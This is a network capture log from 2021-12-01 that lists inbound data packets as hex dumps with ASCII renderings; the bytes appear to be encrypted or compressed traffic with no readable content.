2021-12-01 18:26:22 UTC	263	IN	Data Raw: 35 e2 c4 7d 4b 42 f2 43 a2 7b 65 d1 40 56 9e ba 7d 73 1f 81 5b fe fd d9 2c 36 e3 a8 ca 48 cf 02 14 1f 76 bf 50 f8 6f a4 5d 0f e2 bd a6 3a 7a e1 3f 1f fd a6 20 d2 fe c1 b2 54 75 80 c0 bd 17 27 95 78 79 a5 24 e4 c0 59 09 0c f9 cc bb 07 1f 51 38 a4 d9 a8 4b 7f 53 dc 41 44 2c 9b 82 50 df b7 99 3e 2e 19 20 65 bb 78 07 df 6d 10 6a 14 37 52 7f 6c 12 50 f3 40 0c 1b 44 95 e8 83 06 bd f8 7f 71 c3 51 2e 51 4a e0 3a 2b 9c d0 b1 03 0d c4 ee fe b2 95 8f e8 ea 84 4b 50 17 9f 1d a8 4d ec 0a 2f 0b 1f f1 28 ae 7b 69 ec 72 1f 73 4a e1 68 09 de 9d d3 16 99 8c b3 42 d8 a0 31 84 2d 48 8b 1b 29 5d 7a 54 b3 6c 21 92 df 70 81 b0 69 2a c1 a9 60 8c c0 e2 5a d5 d0 67 25 8a e9 5a bb 70 4e 59 7c ee 5b 50 85 0b 6c 20 db a2 a9 ce 68 fd 2b cc a4 8c 4f f0 0f 4c d2 fe a3 c5 68 c0 aa 93 97 Data Ascii: 5}KBC{e@V}s[,6HvPo]:z? Tu'xy$YQ8KSAD,P>. exmj7RlP@DqQ.QJ:+KPM/({irsJhB1-H)]zTl!pi*`Zg%ZpNY\|[Pl h+OLh
2021-12-01 18:26:22 UTC	265	IN	Data Raw: e2 61 61 d5 b7 45 83 3a 60 74 da 42 22 d8 ff 1a fe 62 6e ff 31 aa 38 7d a8 52 a8 b9 a1 47 d0 b6 21 9b d0 70 e0 9a 84 1d f2 5c f2 78 6c fc 1e ed 28 17 ec f4 36 f9 91 af c9 8d e2 04 f9 6e 19 bd 57 eb a0 c0 de 63 88 21 2a 66 38 ae 8f 17 9d 4e a6 d7 db 31 2d be 74 56 14 67 7f 09 ca 0d c9 71 37 fc 36 b8 cd 8c 0e 26 02 7e c1 fc 1c 39 c2 9a ed d9 24 e5 43 89 e8 ac 56 ca 29 73 68 2d cf 39 3b a6 0e 04 65 07 89 5c 6c f3 28 c6 10 5b 77 af 57 d5 d1 87 d2 a1 6e 3f 03 1e 52 0c 81 d8 b9 50 22 66 73 85 97 5f 16 63 57 45 72 e1 e3 a1 13 8c 30 46 10 8c ca 3b c9 69 3f 53 bf 9d 5d 0a c9 48 a0 71 4e ad a8 1c b7 a7 ec a0 28 0f cd c7 1f 21 3c 03 a8 d5 17 d5 a2 01 d1 17 2a d6 f2 23 a6 dc 74 fb 77 b7 19 b4 be c2 80 7e 10 db 97 40 68 c2 6a 77 74 67 b2 b4 23 96 e8 c7 dc fc c3 03 2c Data Ascii: aaE:`tB"bn18}RG!p\xl(6nWc!f8N1-tVgq76&~9$CV)sh-9;e\l([wWn?RP"fs_cWEr0F;i?S]HqN(!<#tw~@hjwtg#,
2021-12-01 18:26:22 UTC	266	IN	Data Raw: 10 32 a4 2d 18 70 9b d2 20 be c5 fa 51 45 7f 41 0c dc 14 62 ba 1e 63 36 3a 7a 3b 16 02 71 39 81 40 63 1b 37 c9 87 ef 60 d2 8c 18 5f aa 1c 40 38 39 83 14 59 f6 bf c2 70 62 ab 80 98 b2 e1 8f ad 8f 8e 28 45 6e 8a 69 92 29 81 79 3d 79 14 90 2e cb 02 69 8e 1a 43 00 5a 8f 31 64 d9 9d b1 16 ee e9 b8 21 f6 d9 41 f0 48 2c 8f 7a 3f 2e 7f 3b ac 08 72 92 ba 04 f3 d8 1f 5f a8 c7 03 e8 a5 87 5a a7 f5 05 75 e3 9b 28 d4 14 29 77 0e 8b 3a 28 e8 6e 2a 20 b2 fe c5 9a 0d 95 58 b9 81 e2 4f 94 0f 29 f7 8c d4 a7 01 a9 c4 e1 f3 2f 03 b7 30 df bd bc 32 33 64 24 a4 9b ca 5a b7 99 ce a0 50 f0 97 75 9b b5 ee cd 12 63 13 30 fe ea 08 1a 09 8b e8 85 f9 60 26 a3 97 2c 1f cb c4 21 46 31 cc 87 16 d0 31 21 22 20 fc 25 79 52 23 08 b7 b6 1c 38 15 3f 4c cd ef 30 d1 04 60 fd 66 1d e9 d7 17 14 Data Ascii: 2-p QEAbc6:z;q9@c7`_@89Ypb(Eni)y=y.iCZ1d!AH,z?.;r_Zu()w:(n* XO)/023d$ZPuc0`&,!F11!" %yR#8?L0`f
2021-12-01 18:26:22 UTC	267	IN	Data Raw: e2 28 06 55 15 1b 66 ae 6b 80 18 59 90 45 dd cd ff 5d 7a 5b 31 92 89 48 4d 87 f6 a0 b6 78 8a 00 e2 9d f0 24 f3 5b 40 0d 1a a1 0c 4f e5 4d 42 0a 41 e7 6c 18 c7 5a f7 7f 68 1b 9e 04 e4 b4 b6 a6 c5 32 0c 40 5c 3d 34 ef e0 cd 11 50 56 1c b5 fb 6e 42 53 32 71 00 a3 8e 93 7a cd 5e 70 71 ba a6 0c e9 5f 6c 53 da 9d 2f 79 ce 24 ac 05 59 9e ab 73 86 c2 e6 a0 4c 0f 84 b4 00 4d 26 77 91 e6 0b b6 a2 6e cb 72 5a d6 d2 50 85 b0 78 8f 76 84 2f c4 be a7 95 1f 01 be bc 36 35 c2 18 04 05 0b db c0 15 a5 ee a4 e0 90 e2 6e 07 9c 6e 50 58 1b 74 57 3c 69 bc 17 27 c3 b7 e1 51 8a ab c6 40 7f b8 72 b5 26 85 d7 e8 44 9e 6c 58 46 a5 c9 a6 1b 60 3f b5 f1 ac 5e 6c 49 9e 94 6c a6 3a 4e 51 86 24 3b 22 47 91 5c ae f4 73 b6 36 51 0f 19 2a 2c a3 6d 89 29 84 a8 54 f0 c0 15 42 be 1a b2 f8 56 Data Ascii: (UfkYE]z[1HMx$[@OMBAlZh2@\=4PVnBS2qz^pq_lS/y$YsLM&wnrZPxv/65nnPXtW<i'Q@r&DlXF`?^lIl:NQ$;"G\s6Q*,m)TBV
2021-12-01 18:26:22 UTC	269	IN	Data Raw: 70 65 3e fd 09 64 bb 9d d3 41 99 b8 dd 6d aa d9 41 77 ee 3e 07 05 29 e1 1c b3 8c 08 8b 92 94 2a a5 8a 1d 33 82 b5 05 89 b4 e2 0f c9 b9 66 4a 87 8c 7b cf 66 27 19 1b cd 29 47 e8 2f 1f 43 b2 97 d3 9a 68 95 2b eb d0 8e 06 fa 66 5d 93 e2 d0 ce 3b dd d8 88 f9 48 6a b7 42 96 eb eb 01 44 01 10 8d e9 d6 39 a6 ea d8 a0 3d 9b c1 07 c7 d0 82 fe 05 63 43 30 8c bc 0e 68 1a fe fb e9 c9 15 2e d1 b9 2c 29 cb f0 63 19 50 cc 87 33 d0 31 21 22 20 a0 64 34 24 4a 6d d4 e9 6e 75 7a 5e 3f bf 80 59 b7 65 14 dd 46 4e ad a3 59 71 2f d2 a0 5e 4f 91 97 6a 56 b6 f8 6a af 9e 10 c9 cd 8f bd ba 29 75 fd 00 44 e1 b2 76 6b a9 0b 80 71 c5 47 fd 58 36 65 15 77 98 87 f7 aa be 3e e6 e6 06 75 15 46 5f 37 e3 95 66 64 c6 a1 82 c9 65 84 ea ae 55 7d 31 f1 7b 10 60 1a 7d 21 fb 55 8a e9 54 80 ba eb Data Ascii: pe>dAmAw>)*3fJ{f')G/Ch+f];HjBD9=cC0h.,)cP31!" d4$Jmnuz^?YeFNYq/^OjVj)uDvkqGX6ew>uF_7fdeU}1{`}!UT
2021-12-01 18:26:22 UTC	270	IN	Data Raw: 72 d0 e3 e7 13 a8 30 1d 10 89 ca 3e c9 5f 3f 53 bf c1 5d 25 b8 1b c9 59 2b dd f7 49 c7 9e 82 f7 28 66 cd da 6e 29 55 18 cd 91 48 c5 ce 4e a2 2e 2a 85 f2 29 d7 c3 1d fb 12 e1 46 a9 cc 94 f0 2d 62 e2 c8 41 5a ab 6a 6a 05 58 db 81 46 f1 b7 8a b3 f5 b6 16 42 f9 23 50 04 47 37 0b 49 56 ce 4b 55 80 d2 db 3f d6 df 91 03 16 d7 1c db 42 f1 b8 9a 33 f1 1f 34 66 f6 95 c3 48 14 46 e9 82 ef 2a 03 2c f0 f9 18 95 48 7c 3e da 48 4c 7e 2e c5 32 cb 99 01 db 5b 35 66 37 44 48 c2 01 e5 45 a4 a8 07 a3 a5 5a 30 f8 6c e6 9d 01 19 91 a4 8b 4b 65 a6 0c f6 c4 4e 37 de 03 f1 a7 da e6 15 6f 75 b5 81 fc 42 65 db 2a 2f d8 e7 bf 54 d0 ca 51 e6 11 35 e8 c4 11 4b 04 f2 7a a2 68 65 da 40 55 9e b9 7d 57 1f af 5b cd fd c8 2c 21 e3 dc ca 61 cf 05 14 1a 76 ed 50 d0 6f a3 5d 03 e2 ad a6 7d 7a Data Ascii: r0>_?S]%Y+I(fn)UHN.)F-bAZjjXFB#PG7IVKU?B34fHF,H\|>HL~.2[5f7DHEZ0lKeN7ouBe*/TQ5Kzhe@U}W[,!avPo]}z
2021-12-01 18:26:22 UTC	271	IN	Data Raw: 1e 6a b7 42 df a7 d0 1d 47 77 64 84 da e1 12 89 d1 eb fa 3d f0 c1 0d d9 d9 81 bf 52 11 6d 55 f4 8f 67 1a 6e 8b 6f a1 d8 60 aa e3 81 2c 6d cb 95 21 06 31 9d 87 41 d0 58 21 52 20 d4 25 5d 52 25 08 ba b6 6e 38 3c 3f 4d cd e9 30 d2 04 7a fd 22 1d c1 d7 20 14 61 b3 c1 32 22 f4 f2 18 56 96 f8 25 fc ee 7f ac b8 e1 cf e9 4a 1a 98 75 44 93 b2 15 2c cc 79 a0 10 a2 25 94 3a 42 00 7d 05 ed 87 95 61 da 7f aa 23 2b 34 7b f9 70 76 d9 81 03 25 ae ae b3 88 11 a6 92 2a 0f f9 50 21 45 ad 74 1a ba e8 83 9b 78 40 54 28 99 3f e9 61 4e 6f 95 8d c1 e8 fc 0c 93 7b b5 4d f6 3b ff c1 e6 54 4d 1f f0 28 fe 11 19 2e 47 23 f5 9d cd ee 71 14 2f 97 87 13 12 bd d2 29 ef 1a 21 43 be 00 6f ce af 1c 9b 73 0b ec 54 b6 5b 7d 88 23 ed 8c c2 42 a5 a6 48 86 be 4f 81 9d ec 52 f2 be d7 4c 6c 5f 51 Data Ascii: jBGwd=RmUgno`,m!1AX!R %]R%n8<?M0z" a2"V%JuD,y%:B}a#+4{pv%*P!Etx@T(?aNo{M;TM(.G#q/)!CosT[}#BHORLl_Q
2021-12-01 18:26:22 UTC	272	IN	Data Raw: 9c 93 e9 05 1b 89 ee 48 69 00 ae 54 c3 34 58 3e 8a 23 7f 02 7f c3 c8 da 26 d5 6d 9b 44 c7 d6 35 46 be 73 c2 1b 4e 85 e8 f1 bd e5 02 49 f0 94 18 a6 68 f0 3f 86 40 85 7f 47 f3 e2 ca f4 01 b6 5b 51 10 a8 45 2c 48 dc e4 29 38 19 06 f0 0b a4 31 be d6 03 9c 56 d3 61 a5 d9 93 91 a7 50 1e 38 4f 5e 24 d1 f0 d5 d0 3b 14 1c 55 68 80 9a 76 a3 da 76 6d 29 e6 d0 0e 0c cb 25 88 d1 34 87 44 cf 4a 24 64 98 a3 09 cd 06 41 30 2a 67 7c 0b dd 1d 5a 9b 2f 13 2d 53 01 1a cb 14 37 d6 15 76 78 7e 51 9d 75 71 5c 60 ce 76 a7 14 44 37 3e 67 b3 70 21 d2 9c 72 b3 08 07 7e c1 d2 99 ee 94 11 e5 7a 25 88 6a 8b 08 50 3b 39 ba 6e c5 90 39 c1 31 7d 4a 10 a5 17 40 18 26 2f 83 20 c5 71 98 51 32 ce 21 0c 8f a0 06 ba 27 d7 6b 3a 6b 8f 7e 02 7c 8d f2 40 8c af 45 c9 7c 5b 07 d2 5e ac 70 aa eb f4 Data Ascii: HiT4X>#&mD5FsNIh?@G[QE,H)81VaP8O^$;Uhvvm)%4DJ$dA0*g\|Z/-S7vx~Quq\`vD7>gp!r~z%jP;9n91}J@&/ qQ2!'k:k~\|@E\|[^p
2021-12-01 18:26:22 UTC	274	IN	Data Raw: 5a dd d4 32 4f b6 92 74 25 e2 8a 46 c2 9e 47 ac cd 2a bf a1 4c 7b 8d 34 28 ff dd 76 6b 86 09 e7 14 d6 17 e6 37 21 00 0e 04 a5 e2 f4 da 9e 3e 96 e5 23 1a 1a 22 78 5e bb e7 27 16 d7 e0 f6 c9 54 86 dd cb 52 2d 79 9e 37 51 2b 7e 68 44 e1 26 fe e9 25 81 8a 93 8a db 0f ad c0 ee 84 34 84 ab f6 86 dd 4d e9 88 81 6b dc aa 85 55 f7 f3 4d ba f3 19 62 63 73 81 c5 ca 05 27 2f 8d 8f 00 0f b1 fb 2c ed 5f 21 27 b8 2f 65 db 8b 3d 8a 74 1c ea 44 a8 71 76 ce 61 e9 f4 6e 2c 98 b0 40 99 96 6d 85 8c 84 72 1b 3e a4 65 1e d4 6b c3 44 30 80 fe 59 f3 91 cc 1b ea aa 3d 98 2f 4b ee 16 a9 cc 9f bd 3f 79 6a 7c 7a 4a ae fa 1a f1 70 d3 dd a9 23 2d e2 b5 02 40 70 0d 0b a3 05 a8 6c 52 c4 5e af a8 9e 6a 7a b7 31 82 fb 79 2c b6 93 b9 de 56 ef 22 86 e8 f0 78 f6 7e 32 01 6e aa 5c 49 8a 6d 27 Data Ascii: Z2Ot%FG*L{4(vk7!>#"x^'TR-y7Q+~hD&%4MkUMbcs'/,_!'/e=tDqvan,@mr>ekD0Y=/K?yj\|zJp#-@plR^jz1y,V"x~2n\Im'
2021-12-01 18:26:22 UTC	275	IN	Data Raw: 70 b3 c5 b5 18 45 c5 24 9f e6 20 5e de 82 f3 9c b4 e0 61 75 14 b6 e8 e0 27 52 a9 1f 5b f2 84 b1 38 ed af 46 92 0a 5a e9 c4 ac 4b 60 97 46 c7 7d 00 f7 32 59 ea bc 1e 6a 73 fc 3e f8 89 c8 43 3d e3 33 ca 57 bd 01 75 02 13 80 25 e9 0a ba 1c 60 e2 3f a5 46 1f e8 5a 06 8e a6 6d a7 8a a4 ca 08 75 0d c4 86 72 2f f8 78 17 a8 50 ed 90 4a 66 33 9c f9 c8 6e 1f 9d 38 82 ab ab 2a 64 36 f0 2e 77 40 f3 e7 4c af f6 ab 02 40 1e 50 7f d3 7b 73 ba 6d fb 69 6a 45 54 1c 67 61 4a c0 72 42 7e 3c bd bf ef 06 44 fb 48 03 c5 32 25 22 4a d3 26 6d 9f a2 b1 77 35 c4 92 fb e5 fc e1 ad f7 8f 4b 22 7d ea 3e a2 5e 8f 4d 0e 10 02 f1 27 a7 1e 3e 83 6d 46 34 78 fc 5b 01 df f4 a1 73 fa 9d b4 4e c4 d9 41 80 4a 6b be 0e 09 57 7e 4f a4 65 65 fb ad 61 e2 ac 06 2d b8 90 60 ff c5 d0 35 d0 e6 31 77 Data Ascii: pE$ ^au'R[8FZK`F}2Yjs>C=3Wu%`?FZmur/xPJf3n8*d6.w@L@P{smijETgaJrB~<DH2%"J&mw5K"}>^M'>mF4x[sNAJkW~Oeea-`51w
2021-12-01 18:26:22 UTC	276	IN	Data Raw: 86 ce 2b ba e4 e8 98 02 8f fc e3 c0 98 7a f8 a2 aa 6a c5 a3 94 78 dd f8 50 81 96 2f 63 2a 9b e9 f6 c6 10 08 29 9a 87 32 04 b6 c2 37 ea 4e 19 63 bf 5e 41 cc 96 1e 8a 7a 1c 9e 31 e5 3a 4a cd 69 ec 91 cd 4b a4 b0 6a 8c a9 5e e0 5f 86 21 97 4e a1 69 0f d5 6c cb 5c 08 a8 f7 45 f3 e3 a5 b9 9c 8d 2a bd 3e 7a e7 57 84 e4 a6 9f 6f c1 5d 18 3d 5c b6 e3 7b 9d 03 a7 eb b3 3f 41 8e 31 7e 71 76 0a 12 af 3c c9 db 37 c3 7e 9a a8 8b 48 15 6e 55 a4 fb 4c 2c b6 9e ba b6 24 07 43 b1 a0 b3 24 96 48 34 0d 5e a6 7e 5e 86 7a 2d 17 38 cc 14 3b c7 28 16 10 3b 3f d9 32 90 82 c6 b7 a6 07 6d 6f 1a 3d 58 e5 85 cb 41 43 22 1b e2 97 a3 16 00 1f 36 17 d7 a8 fd 7c ba 5e 36 7f d6 ae 69 bb 0f 5e 27 d7 9d 5d 58 b9 77 a1 60 47 f2 b2 0b a2 a1 f7 d4 4d 4a b5 e3 6e e1 55 24 85 a0 21 da ab 21 d2 Data Ascii: +zjxP/c)27Nc^Az1:JiKj^_!Nil\E>zWo]=\{?A1~qv<7~HnUL,$C$H4^~^z-8;(;?2mo=XAC"6\|^6i^']Xw`GMJnU$!!
2021-12-01 18:26:22 UTC	277	IN	Data Raw: 84 3e 67 fd c3 20 d2 fe c1 b2 08 75 cd c0 d2 17 5d 95 11 79 c9 24 88 c0 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 10 53 a4 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 ba 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 14 4e 77 7c 8b 5b 28 85 6e 6c 20 db fe a9 9a 68 95 2b b9 a4 e2 4f 94 0f 29 d2 8c a3 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 98 32 f4 f0 cc 0c f2 b9 fe 4c d8 57 eb cb ed b7 bf 25 de 9a c0 10 1e 38 21 f8 23 1d 66 59 86 Data Ascii: >g u]y$8Pn#8KSA, Q. mcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!AH,zZ.;!i_`Z%(Nw\|[(nl h+O)h/jBn37$Z2LW%8!#fY
2021-12-01 18:26:22 UTC	279	IN	Data Raw: a2 28 39 ef 44 bd d2 95 49 09 e7 66 d9 f9 5f 19 30 a8 ca a0 f0 9a b4 8a 22 a7 49 30 9e 04 ab d1 22 60 f1 58 b0 25 ab a5 ec 60 4c 3e 69 7d 60 84 33 e1 9f 81 1c ab 3e e6 76 64 b2 39 83 69 44 8a d5 26 f8 25 86 42 09 dc 96 d5 0b 2a 35 61 52 ec c7 7d e4 02 43 8e 64 ef 2d 57 01 5d e6 58 4b bc d7 dc 25 99 77 3a d5 08 4e 02 58 53 df 8f 86 f8 2a e7 23 7b fd b4 a5 70 15 56 7d 73 ee e0 4e 5e 48 e2 05 b7 31 88 08 81 5c ef d8 fd 99 d8 b9 cd a0 c6 b2 44 98 f8 c4 80 d6 ca 25 c5 00 49 7b 6e 4d 55 fc 51 c2 88 b6 ce 6e ee ff 5d ea be db bb 94 2d c3 11 74 0e 3b 01 e6 73 61 8e be c7 b0 c7 c2 6a 04 40 80 dd 81 cd 75 76 4e ad d1 3d ae 03 17 eb 91 ec 06 b4 b5 48 a8 27 08 d6 23 d3 94 21 0f 0d b3 08 88 0e 69 00 a5 12 d0 65 87 1a 52 c3 9f 4e cb c3 1b 14 24 32 d2 37 5d db a2 df 11 Data Ascii: (9DIf_0"I0"`X%`L>i}`3>vd9iD&%B5aR}Cd-W]XK%w:NXS#{pV}sN^H1\D%I{nMUQn]-t;saj@uvN=H'#!ieRN$27]
2021-12-01 18:26:22 UTC	279	IN	Data Raw: 41 e7 25 a5 43 7c 2b 14 40 a4 19 69 6d 96 bf 28 f7 8d 8b e8 3b 2f 24 20 af f8 0c 06 7a af f0 bf 5c 5c 90 3a 2f 4e 92 8c f8 6f 47 74 72 29 69 a7 23 e8 b7 a4 81 66 38 67 80 ef 55 75 60 94 3c 0f 9f 73 63 ef 51 29 b3 f7 fc ae 15 17 5d 5e 79 53 64 3c 88 46 23 80 85 06 98 56 e5 f9 8f dc ad b3 14 72 f1 3a f2 0c 68 a0 1e a2 d7 8e ec 92 8e 90 91 cc c9 e8 e2 58 b9 5f 19 8b 57 c5 a0 f0 de 3f 88 6e 2a 13 38 da 8f 7b 9d 21 a6 b8 db 5a 2d e2 74 06 14 15 7f 66 ca 6b c9 18 ef 90 36 dd c3 e0 b4 74 02 85 c8 44 3d f5 c3 ba 20 97 70 e2 2a 91 c8 80 24 9c 4e 32 09 77 ef 6f 5a 8b 60 2d 11 61 eb 09 4c b5 5d 99 30 01 19 be 13 ab 82 96 bf aa 0a 69 2d 51 5f 3e a5 e0 b9 11 22 56 73 b5 3a 45 e1 b8 be 3b eb 1b 0a d9 8a 75 d9 3a 89 02 71 2e 53 e6 d7 19 26 25 d1 55 20 9d 25 4f b2 26 1e Data Ascii: A%C\|+@im(;/$ z\\:/NoGtr)i#f8gUu`<scQ)]^ySd<F#Vr:hX_W?n8{!Z-tfk6tD= p$N2woZ`-aL]0i-Q_>"Vs:E;u:q.S&%U %O&
2021-12-01 18:26:22 UTC	281	IN	Data Raw: 45 c5 a2 0c 6b 51 be 79 7b 89 d0 ea 19 52 e4 4d c5 a6 14 49 44 73 4c 27 8b 23 02 f1 77 b8 49 4d c1 d3 a7 65 15 6a d1 31 44 31 00 cf 38 09 18 7a 72 b3 12 fb 63 bc 3e ac fd 06 9b 19 5c c5 c3 59 8e c3 e7 de c5 99 51 2e 3f 97 0d fe 9f 07 f6 6e a5 2b c5 f0 d0 35 4b 99 3b b3 f7 0d 90 4c 88 e9 e6 43 59 f8 54 72 6c 10 bf 96 d2 d4 90 f0 83 c3 83 88 a4 85 ab 39 fa 0d c7 63 c3 2e 38 e5 6f ef 69 cd 29 f0 f2 48 f2 79 d1 44 c2 3e e2 ec 56 73 c6 7f 70 ce 8f b1 d8 e0 e9 d5 64 d9 0f ea eb be bd c1 6e d3 32 d7 3b 06 34 c1 08 68 11 1d 0c c0 27 af 16 3e 03 29 63 30 03 81 a8 55 33 da 1c 16 c3 bc 55 89 77 7c 8b 5b 28 c9 e5 d8 04 73 c0 a9 9a 29 1e ee f5 2f 4e 6b 74 31 29 d2 c0 28 03 4c 71 94 e1 97 67 e1 1b 66 0f a6 bc 6e 7f bc 98 f9 3b 87 5a c3 d1 2a 64 8d ce a4 75 f6 eb b5 0e Data Ascii: EkQy{RMIDsL'#wIMej1D18zrc>\YQ.?n+5K;LCYTrl9c.8oi)HyD>Vspdn2;4h'>)c0U3Uw\|[(s)/Nkt1)(Lqgfn;Z*du
2021-12-01 18:26:22 UTC	282	IN	Data Raw: f8 99 66 5d c1 19 a8 e8 13 f0 e6 01 e3 f2 3a f2 44 93 60 56 21 d0 75 90 77 7e 1d dd e8 a1 17 f7 3a f3 5f 19 0e ba ca 24 4c de 3f 88 26 49 d5 7c 51 4c 3f b6 a5 82 50 db 5a 2d a3 ff d2 55 1a c9 e2 cd c7 de 18 37 d1 bd 51 4a 5b 19 7a 02 78 c2 46 e3 ac 49 e5 a9 3d a8 ae b3 e2 e8 f0 12 d8 e3 08 0b dc 8a 27 f3 a0 85 86 24 4e 3f e8 6b 1b 3f f7 10 29 fc 12 d0 30 c6 b6 d2 8c 6d c3 fc bd 16 bf 82 a1 32 c0 6a dd b8 f0 12 a7 62 19 c7 30 7d 15 e7 9b 9b cc 78 fd 59 bb 82 8f 23 5e 4a bc 54 ab 15 f4 f4 00 a1 fa 3e 44 fe 73 c7 8e 09 53 69 84 19 37 90 68 22 6c 85 85 8e f7 c1 d8 26 75 26 ce f2 50 96 3b 91 08 16 9c 46 c4 85 a4 3f e0 83 35 db bd 80 8b 69 da 80 e6 af fa 02 2e 23 80 4b 90 b6 6e ab fa dd af fb 53 0c cb 6d 81 ce 17 55 b6 d5 59 39 8a df 46 e8 5f 9f 11 1d 67 fe 61 Data Ascii: f]:D`V!uw~:_$L?&I\|QL?PZ-U7QJ[zxFI='$N?k?)0m2jb0}xY#^JT>DsSi7h"l&u&P;F?5i.#KnSmUY9F_ga
2021-12-01 18:26:22 UTC	283	IN	Data Raw: 3e 16 9a 7d d7 6c 03 ad 05 dc 60 ab 22 ff f7 ae 30 bc d9 04 75 17 ef a2 6a e1 98 4b 7f 46 84 c8 75 ee b1 cf e7 39 93 21 6a 45 36 e1 89 0d 96 31 c9 92 74 9f f3 8a 63 e1 a8 3e 40 48 b7 d3 2d 5c 44 88 03 12 99 e9 95 aa 26 fd 91 f0 48 2c 97 f7 16 0a 39 34 77 4c 05 ab 65 01 81 d8 69 1b 4a 83 44 dc 06 86 b3 2f 89 04 ad a2 eb 27 0d 50 6a 4d f4 ca 58 27 33 2a 48 1b 53 bf ad 5d 29 90 bb 29 34 72 89 d5 06 b9 2d 99 29 a3 68 a9 e2 6a db 0b 2a ff c9 5b bc 64 6e 33 37 42 1a 9a f1 e2 4b d8 a9 af 8b 74 80 ac a9 b5 ee 45 76 60 4c 86 08 ce bd 1a 6e 8b 12 c4 9c 6f fd 27 e4 f7 29 cb f0 a9 34 34 f1 31 b7 f4 ed 21 22 20 28 64 32 5d fc 8c f0 6b 6e 38 7a b7 7e ca 8f 86 33 20 ca fd 46 1d 25 96 51 1b 99 37 84 ed 4f f4 97 90 17 9f f7 93 2b ca f8 ac cd e1 db 2e 68 10 02 95 0c 18 3e Data Ascii: >}l`"0ujKFu9!jE61tc>@H-\D&H,94wLeiJD/'PjMX'3HS]))4r-)hj[dn37BKtEv`Lno')441!" (d2]kn8z~3 F%Q7O+.h>
2021-12-01 18:26:22 UTC	285	IN	Data Raw: ed b6 24 8a 43 e2 32 d4 56 f3 29 40 68 1a 21 28 3b e5 0e 42 65 41 77 48 6c c7 28 f7 10 68 71 bb 57 e4 d1 b6 d2 c5 78 29 03 5c 52 34 81 e0 9f 34 22 56 73 b5 97 6e 2e 76 57 71 72 a3 e3 93 43 e8 30 70 10 ba ca 0c c9 5f 3f 53 bf 9d 5d 79 3a 01 c9 05 2b 9e f7 73 a9 e7 82 a0 28 0f cd b4 6e 4d 55 77 cd e6 48 b6 ce 6e a2 72 2a d6 f2 50 f3 b0 6a 8f 68 84 62 c4 cc a7 f0 1f 46 c9 b2 12 5a c2 6a 04 05 0b db c0 46 a5 b7 a4 b3 90 b6 6e 1e 9c 6e 50 6d 1b 54 57 3b 69 a1 17 26 c3 bd e1 59 8a ab c6 5f 7f 80 72 b2 26 9f d7 fe 44 9e 6c 43 46 85 c9 e3 1b 5a 3f bd f1 b3 5e 40 49 85 94 6a a6 3a 4e 5b 86 26 3b 0a 47 93 5c ae f4 73 b6 28 51 0f 19 2b 2c ac 6d b9 29 f3 a8 6e f0 cb 15 54 be 03 b2 ea 56 6a d0 a4 d9 4b 20 a6 50 f6 89 20 5e aa 60 95 d5 b6 89 79 1c 5b da e5 9a 2e 11 b7 Data Ascii: $C2V)@h!(;BeAwHl(hqWx)\R44"Vsn.vWqrC0p_?S]y:+s(nMUwHnr*PjhbFZjFnnPmTW;i&Y_r&DlCFZ?^@Ij:N[&;G\s(Q+,m)nTVjK P ^`y[.
2021-12-01 18:26:22 UTC	286	IN	Data Raw: 6d 40 e6 ba 50 e9 aa 0c 3e a5 c7 60 5d c2 c0 3f d3 80 77 4a 80 a8 4c df 66 2b 04 0f 8b 5b 8e 84 28 00 55 a8 96 e0 f4 1b e1 59 cc c7 96 26 fb 61 6a b3 ef cb c2 68 74 af b7 fe 5d 1e c2 23 b3 c9 c9 0b 41 4e 24 dd d0 fc 08 8d dc e7 93 0f de c0 19 c5 b5 ee 16 34 31 37 5c ca 98 02 7f 2f e5 e9 ec cb 14 39 ca ae 4b 29 09 f5 73 01 5d ab e9 5a b3 5e 45 47 73 d4 57 5d 3c 2d 5c bb f7 00 4b 13 6c 4b bf e9 5e d0 04 14 93 32 79 c1 bb 77 70 43 df a0 32 4f f4 97 18 56 96 f8 25 af ee 10 ac cd e1 bd e9 29 1a fd 75 44 93 b2 15 6b cc 0b a0 71 a2 47 94 58 42 65 7d 77 ed 87 95 aa 9e 3e aa e6 6f 75 7b 46 34 37 d9 95 46 64 ae a1 f6 c9 11 84 9a ae 26 7d 0b f1 54 10 4f 1a 1a 21 92 55 fe e9 3c 80 cf eb e3 af 5f cf af 8d cd 57 f7 ab 93 a7 9a 28 b1 d5 ee 0f 10 d7 e0 1d 16 be 29 d6 2f Data Ascii: m@P>`]?wJLf+[(UY&ajht]#AN$417\/9K)s]Z^EGsW]<-\KlK^2ywpC2OV%)uDkqGXBe}w>ou{F47Fd&}TO!U<_W()/
2021-12-01 18:26:22 UTC	287	IN	Data Raw: 73 c7 41 46 b4 eb 8c 21 fc ed 29 71 6f cd 5f 04 c1 e8 69 f1 27 7c 81 c1 a6 3f 92 19 8f 12 3d 0f 33 ce df 79 5b 46 a2 20 22 5e c2 6a bd 5d af 88 25 cf e1 93 84 5b 96 b2 6e 42 25 33 b1 8e d8 bc bf a1 93 cd 17 55 7a 7d 50 63 1e 56 82 27 53 3f 9e d8 26 f1 6e a9 44 6f f9 bd 02 d2 f9 2b c5 17 3f e9 7a 37 d5 47 6d ac 1f 60 9a 4b b6 b7 fa 6c 2b ff 78 95 19 cb f4 75 b1 68 91 8f a1 47 2c c2 d5 a9 28 a4 a8 61 c9 e2 11 45 50 9a f5 a5 57 6c 38 ab 6e 1c 26 a9 e7 b1 9d cb 8c aa 42 7c 9a fe 8a dd 9f 0c de 81 11 43 64 de 75 68 a3 0c d3 57 ff ce 1e 20 6c 72 77 47 bc 63 a7 18 2b d7 ea e8 f0 64 04 ce 2a ae 80 5b 8b 63 10 a2 f1 a1 03 1c 25 82 eb 38 b6 5c 75 b8 ce 93 be a5 e1 9f 5b 23 b0 31 7e 7e ec 3f 57 